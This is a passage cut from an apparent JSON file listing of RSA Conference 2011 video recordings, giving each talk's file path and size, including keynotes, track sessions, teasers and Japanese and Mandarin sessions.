Schneier.mp4", "length": 71190347}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts/RSA Conference 2011 - The Seven Most Dangerous New Attack Techniques, and What s Coming Next.mp4", "length": 61726685}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts/RSA Conference 2011 - Top Website Vulnerabilities Trends, Business Effects and How to Fight Them.mp4", "length": 56757052}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts/RSA Conference 2011 - Update on DNSSEC A Discussion with the Experts.mp4", "length": 88330438}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Advanced Persistent Threats War Stories from the Front Lines.mp4", "length": 2736672}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Cloudiquantanomidatumcon The Infra Info-Centric Debate in the Cloud.mp4", "length": 3107999}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Cyber War How We Learned to Stop Worrying and Love the Cyber Bomb.mp4", "length": 2735915}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - DNSSEC A Discussion with the Experts.mp4", "length": 2355636}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Don t Teach Developers Security.mp4", "length": 3081231}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Extreme Makeover Open Source Edition.mp4", "length": 3068099}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - From White Hat to Black-Curious Case of Cybercrime Kingpin Max Vision.mp4", "length": 2730813}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Hacking Exposed - Exploiting the Cloud and Virtual Machines.mp4", "length": 3093445}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - How to Recruit Spies on the Internet.mp4", "length": 2382233}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Misconceptions of Security.mp4", "length": 2737752}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Public, Meet Private Lessons Learned in Chasing Cyber Crooks.mp4", "length": 2369805}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - The Dishonest Minority Security as Society s Enabler.mp4", "length": 3078736}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - The Seven Most Dangerous New Attack Techniques, and What s Coming Next.mp4", "length": 2750330}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Industry Experts Track Speaker Teasers/RSA Conference 2011 - Top Website Vulnerabilities Trends, Business Effects and How to Fight Them.mp4", "length": 2389305}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/Conference 2011 Keynote - The Department of Defense, Active Cyber Defense, and the Secure Zone.mp4", "length": 43438967}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 - Cyberwar, Cybersecurity, and the Challenges Ahead - James Lewis.mp4", "length": 77050937}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - The Murder Room Breaking the Coldest Cases - Michael Capuzzo.mp4", "length": 64821209}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Who Are You When Security Hinges on Identity - Francis deSouza.mp4", "length": 45142763}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Collective Defense Collaborating to Create a Safer Internet.mp4", "length": 50804819}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Defending a New Domain The Pentagon s Cyber Strategy.mp4", "length": 34113593}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Driving Security Down the Stack - George Kurtz.mp4", "length": 46016754}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Letting Go and Keeping Control Beyond the PC and Data Center.mp4", "length": 35312789}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Secure This Every Device, Every Cloud, Every Moment - Tom Gillis.mp4", "length": 43928756}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Secure, Global Collaboration Made Possible - Michael Denning.mp4", "length": 49575162}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Securing the Enterprise in a Changing World - Bill Veghte.mp4", "length": 27090744}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - The Cryptographers Panel - Ari Juels.mp4", "length": 76084286}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - The Future of Security in the Era of Cloud Computing - On Twitter.mp4", "length": 42211216}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - The Hugh Thompson Show - Hugh Thompson.mp4", "length": 90142505}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote - Trust in the Cloud Proof Not Promises - Art Coviello.mp4", "length": 51417758}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Full Version/RSA Conference 2011 Keynote-The Next 20 Yrs Interacting with Computers, Telecom & AI in the Future.mp4", "length": 80913143}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - The Murder Room Breaking the Coldest Cases.mp4", "length": 3292482}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Who Are You When Security Hinges on Identity.mp4", "length": 2804884}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Collective Defense Collaborating to Create a Safer Internet.mp4", "length": 3296535}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Cyberwar, Cybersecurity, and the Challenges Ahead.mp4", "length": 3750935}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Defending a New Domain The Pentagon s Cyber Strategy.mp4", "length": 3254048}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Driving Security Down the Stack.mp4", "length": 3278692}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Letting Go and Keeping Control Beyond the PC and Data Center.mp4", "length": 3288834}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Next 20 Years Interacting with Computers, Telecommunication, AI in the Future.mp4", "length": 3740965}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Secure This Every Device, Every Cloud, Every Moment.mp4", "length": 3286585}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Secure, Global Collaboration Made Possible.mp4", "length": 2795296}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Securing the Enterprise in a Changing World.mp4", "length": 2785988}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - The Cryptographers Panel.mp4", "length": 3740994}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - The Department of Defense, Active Cyber Defense, and the Secure Zone.mp4", "length": 3287360}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - The Hugh Thompson Show.mp4", "length": 4649130}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 - Trust in the Cloud Proof Not Promises.mp4", "length": 2326302}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSA Conference 2011 Keynote - The Future of Security in the Era of Cloud Computing - On Twitter.mp4", "length": 42211216}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Keynote Teaser Clips/RSAConference 2011 - Security in the Era of Cloud Computing--Live Discussion Twitter (#RSACcloud).mp4", "length": 2796332}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night - Ben Rothke.mp4", "length": 17902978}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night - Hugh Thompson.mp4", "length": 32707427}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night - Jeff Bardin.mp4", "length": 38726723}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night - Josh Corman.mp4", "length": 20295143}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night - Uri Rivner.mp4", "length": 35025624}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night - William Cheswick.mp4", "length": 29770795}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Pecha Kucha Night/RSA Conference 2011 Pecha Kucha Night -Todd Inskeep.mp4", "length": 33955807}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 - \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30fb\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306e\u767a\u5c55\u304a\u3088\u3073\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3....mp4", "length": 77791250}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 - \u30d9\u30ac\u30b9\u306e\u51fa\u6765\u4e8b\u306fYouTube\u3067\u7d9a\u304f... - Ben Rothke.mp4", "length": 28921690}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 - \u30e2\u30d0\u30a4\u30eb\u8a8d\u8a3c\u3068\u30d5\u30ec\u30f3\u30c9\u30ea\u30fc\u8a50\u6b3a\u306e\u30c8\u30ec\u30f3\u30c9.mp4", "length": 23494646}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 - \u30ea\u30b9\u30af\u7ba1\u7406\u306e\u5b9f\u8df5\u7684\u30a2\u30d7\u30ed\u30fc\u30c1 -Bruce Jones.mp4", "length": 21872022}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 - \u653b\u6483\u5bfe\u8c61\u306e\u5206\u6790\u3068\u524a\u6e1b\u306e\u539f\u5247 - Michael Howard & Bryan Sullivan.mp4", "length": 31292630}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 US - FUD(\u4e0d\u5b89\u3001\u7591\u5ff5\u3001\u4e0d\u4fe1\uff09\u306e\u306a\u3044BlackBerry - Adam Meyers.mp4", "length": 25132089}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 US - \u30af\u30e9\u30a6\u30c9\u306e\u8abf\u67fb\u3068\u30d5\u30a9\u30ec\u30f3\u30b8\u30c3\u30af - Davi Ottenheimer.mp4", "length": 31818779}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 US - \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30fb\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306e\u5168\u4f53\u50cf Brian Chess.mp4", "length": 31898046}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 US - \u30c7\u30fc\u30bf\u6f0f\u6d29\u8abf\u67fb\u30ec\u30dd\u30fc\u30c8\u306e\u80cc\u666f\u4e8b\u60c5 - Bryan Sartin.mp4", "length": 72695791}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference 2011 \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30e1\u30c8\u30ea\u30af\u30b9 \u521d\u5fc3\u8005\u5411\u3051\u30ac\u30a4\u30c9 - Caroline Wong.mp4", "length": 43935953}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Japanese)/RSA Conference US - 2011\u5e74\u306e\u4e16\u754c\u7684\u306a\u60c5\u5831\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306e\u8abf\u67fb.mp4", "length": 27856705}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 \u505c\u6b62\u66b4\u9732\u81ea\u5df1\uff1a\u5206\u6790\u548c\u51cf\u5c11\u653b\u51fb\u9762\u7684\u539f\u5219.mp4", "length": 32417473}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 \u8f6f\u4ef6\u5b89\u5168\u4fdd\u8bc1\u7684\u6f14\u53d8\u4ee5\u53ca\u76ee\u524d\u7684\u76f8\u5173\u60c5\u51b5 - Jacob West.mp4", "length": 36264578}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 - 2010 \u5e74 Verizon \u6570\u636e\u6cc4\u5bc6\u8c03\u67e5\u62a5\u544a\u7684\u4e00\u4e9b\u5e55\u540e\u6545\u4e8b - Bryan Sartin.mp4", "length": 42382898}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 - \u4e91\u8ba1\u7b97\u73af\u5883\u4e2d\u7684\u6570\u5b57\u53d6\u8bc1\u548c\u8c03\u67e5 - Davi Ottenheimer.mp4", "length": 78209740}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 - \u5b89\u5168\u6307\u6807\uff1a\u5165\u95e8\u8005\u6307\u5357 - Caroline Wong.mp4", "length": 79794516}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 - \u6ca1\u6709 FUD \u7684 BlackBerry \u5b89\u5168\u6027 - Adam Meyers.mp4", "length": 15389984}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 - \u98ce\u9669\u7ba1\u7406\u5b9e\u7528\u505a\u6cd5 - Bruce Jones.mp4", "length": 55904795}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 \u53bb YouTube \u770b\u770b Vegas \u53d1\u751f\u4e86\u4ec0\u4e48\uff1a\u5b89\u5168\u4e0e\u516c\u53f8\u793e\u4ea4\u7f51\u7edc.mp4", "length": 30216314}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 \u53d8\u5316\u4e2d\u7684\u884c\u4e1a\uff1a2011 \u5168\u7403\u4fe1\u606f\u5b89\u5168\u72b6\u51b5\u7814\u7a76 - Hord Tipton.mp4", "length": 30034111}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 \u79fb\u52a8\u8eab\u4efd\u9a8c\u8bc1\u548c\u9632\u6b3a\u8bc8\u7684\u8d8b\u52bf - Markus Jakobsson & Richard Chow.mp4", "length": 23179160}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Sessions (Mandarin)/RSA Conference 2011 \u8f6f\u4ef6\u5b89\u5168\uff1a\u6982\u8ff0 - Brian Chess.mp4", "length": 63921705}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - A Practical Approach to Risk Management - Bruce Jones.mp4", "length": 23422128}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - A Study on The State of Web Security - Patrick Peterson & Henry Stern.mp4", "length": 30578606}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Agile Development, Security Fail - Adrian Lane.mp4", "length": 26145885}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Applying the Secure Product Lifecycle to Flash Content - Peleus Uhley.mp4", "length": 27219648}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Aspire to a Network Free of Malicious Programs.mp4", "length": 34400609}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Awareness for the ADD and ADHD Society.mp4", "length": 25772653}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Behind the Verizon Business 2010 Data Breach Investigations Report.mp4", "length": 28290787}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - BlackBerry Security FUD Free - Adam Meyers.mp4", "length": 26886262}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Browsing Known Sites is Safe - True or False - Lukas Hasik & Jiri Sejtko.mp4", "length": 27809592}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Building a Global Privacy Program Leveraging Binding Corporate Rules.mp4", "length": 28088677}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Cloud Investigations and Forensics - Davi Ottenheimer.mp4", "length": 29522453}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Combat IT Sabotage Technical Solutions from the CERT Insider Threat Lab.mp4", "length": 31956669}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Cyber War How We Learned to Stop Worrying and Love the Cyber Bomb.mp4", "length": 77623275}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Drive By Downloads How to Avoid Getting a Cap Popped in Your App.mp4", "length": 39140326}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Ethical Considerations Involving the Use of Force in Cyberspace.mp4", "length": 33145274}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Everything You Ever Wanted to Know About DLP - Rich Mogull.mp4", "length": 30289764}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Government Information Security The State of the Union.mp4", "length": 30630133}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - How Malware Authors Are Winning the War.mp4", "length": 29365156}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Intelligence on the Intractable Problem of Insecure Software.mp4", "length": 32007689}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Is it Time to Put HIPS in the Recycle Bin - Eric Ogren.mp4", "length": 23962660}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Lightning Round Mobile Security the Ugly Truth.mp4", "length": 26253740}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Loose Lips Sink Networks - Is Social Networking Making Your Network Insecure.mp4", "length": 25075999}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Luring Your Prey The Art of Effectively Communicating with a Cyber Predator.mp4", "length": 23484786}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Making Security Decisions Disappear into the User s Workflow - Alan Karp.mp4", "length": 24771933}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Mapping an Organization s DNA Using Social Media - Abhilash Sonwane.mp4", "length": 28669408}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Overlooked Security Threats of Data Recovery Operations.mp4", "length": 15206038}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Payment Data in 2011 and Beyond Investigating Updates to the PCI Standards.mp4", "length": 27806040}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Red Pill, Blue Pill - Prescriptions for Curing Compliance Complexity.mp4", "length": 31681580}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Rethinking Passwords - William Cheswick.mp4", "length": 26644045}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Scanning the Ten Petabyte Cloud Finding the Malware that Isn t There.mp4", "length": 23110172}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Security Business Cases Fact and Fiction in Selling Security.mp4", "length": 46370592}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Security Metrics A Beginner s Guide - Caroline Wong.mp4", "length": 27035475}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Software Security The Big Picture - Brian Chess.mp4", "length": 24514085}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Stop Exposing Yourself Principles of Attack Surface Analysis and Reduction.mp4", "length": 27926675}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - The Evolution of Software Security Assurance and its Relevance Today.mp4", "length": 29637559}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - The Machinery of Cybercrime Uncut and Uncensored!.mp4", "length": 36318895}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - The Manchurian Device Problem - Phillip Hallam-Baker.mp4", "length": 29643873}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - The Psychology of Risk Why Understanding Human Behavior is Essential.mp4", "length": 22446529}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - The U.S. Cyber Challenge Developing the Next Generation of Cyber Guardians.mp4", "length": 26773260}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Thirty Thousand Records, Four Weeks, and No Time to Lose - Julie Fitton.mp4", "length": 23809357}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - TLS Renegotiation Vulnerability.mp4", "length": 24040368}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Trends in Mobile Authentication and Fraud Deterrence.mp4", "length": 22472575}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Trusted IaaS - Hemma Prafullchandra & Charlton Barreto.mp4", "length": 42557859}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - What Happens in Vegas Goes on YouTube Security and Corporate Social Networks.mp4", "length": 19304173}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Why Johnny Can t Navigate Away from this iFrame A PHP Malware Primer.mp4", "length": 25336441}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Full Version/RSA Conference 2011 - Wireless Vulnerabilities in the Wild View from the Trenches - Gopinath K.N..mp4", "length": 22650477}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2010 - Behind the Verizon Business 2010 Data Breach Investigations Report.mp4", "length": 2737254}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2010 - Thirty Thousand Records, Four Weeks, and No Time to Lose.mp4", "length": 2732565}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - A Changing Industry The 2011 Global Information Security Workforce Study.mp4", "length": 2714574}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - A Practical Approach to Risk Management.mp4", "length": 3070549}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - A Study on The State of Web Security.mp4", "length": 3060326}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Agile Development, Security Fail.mp4", "length": 3087687}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Aspire to a Network Free of Malicious Programs.mp4", "length": 3086504}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Awareness for the ADD and ADHD Society.mp4", "length": 2732472}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - BlackBerry Security FUD Free.mp4", "length": 2723526}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Browsing Known Sites is Safe - True or False.mp4", "length": 2731670}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Building a Global Privacy Program Leveraging Binding Corporate Rules.mp4", "length": 3093015}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Cloud Investigations and Forensics.mp4", "length": 3075872}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Combat IT Sabotage Technical Solutions from the CERT Insider Threat Lab.mp4", "length": 3064197}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Drive By Downloads How to Avoid Getting a Cap Popped in Your App.mp4", "length": 2721021}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Ethical Considerations Involving the Use of Force in Cyberspace.mp4", "length": 2739207}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Everything You Ever Wanted to Know About DLP.mp4", "length": 3076576}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Government Information Security The State of the Union.mp4", "length": 2720211}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - How Malware Authors Are Winning the War.mp4", "length": 2727127}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Innovation in Application Security.mp4", "length": 3086550}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Intelligence on the Intractable Problem of Insecure Software.mp4", "length": 3097274}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Is it Time to Put HIPS in the Recycle Bin.mp4", "length": 3087407}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Lightning Round Mobile Security the Ugly Truth.mp4", "length": 3080272}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Loose Lips Sink Networks Is Social Networking Making Your Network Insecure.mp4", "length": 2733167}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Making Security Decisions Disappear into the User s Workflow.mp4", "length": 2732586}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Mapping an Organization s DNA Using Social Media.mp4", "length": 3077035}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Metrics are Bunk! The Zombie Apocalypse, Baseball, and Security Metrics.mp4", "length": 3073885}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Overlooked Security Threats of Data Recovery Operations.mp4", "length": 2735736}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Payment Data in 2011 and Beyond Investigating Updates to the PCI Standards.mp4", "length": 2735587}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - PKI, Lemon Markets and Lemonade.mp4", "length": 2743335}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Red Pill, Blue Pill - Prescriptions for Curing Compliance Complexity.mp4", "length": 3087599}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Rethinking Passwords.mp4", "length": 2717553}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Scanning the Ten Petabyte Cloud Finding the Malware that Isn t There.mp4", "length": 2737570}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Security Business Cases Fact and Fiction in Selling Security.mp4", "length": 2738131}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Security Metrics A Beginner s Guide.mp4", "length": 2746659}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - Software Security The Big Picture.mp4", "length": 3064261}, {"path": "RSAC 2011/2011 RSAC USA/2011 US Track Session Teasers/RSA Conference 2011 - The Evolution of Software Security Assurance and its Relevance Today.mp4", "length": 2738520}, {"path": 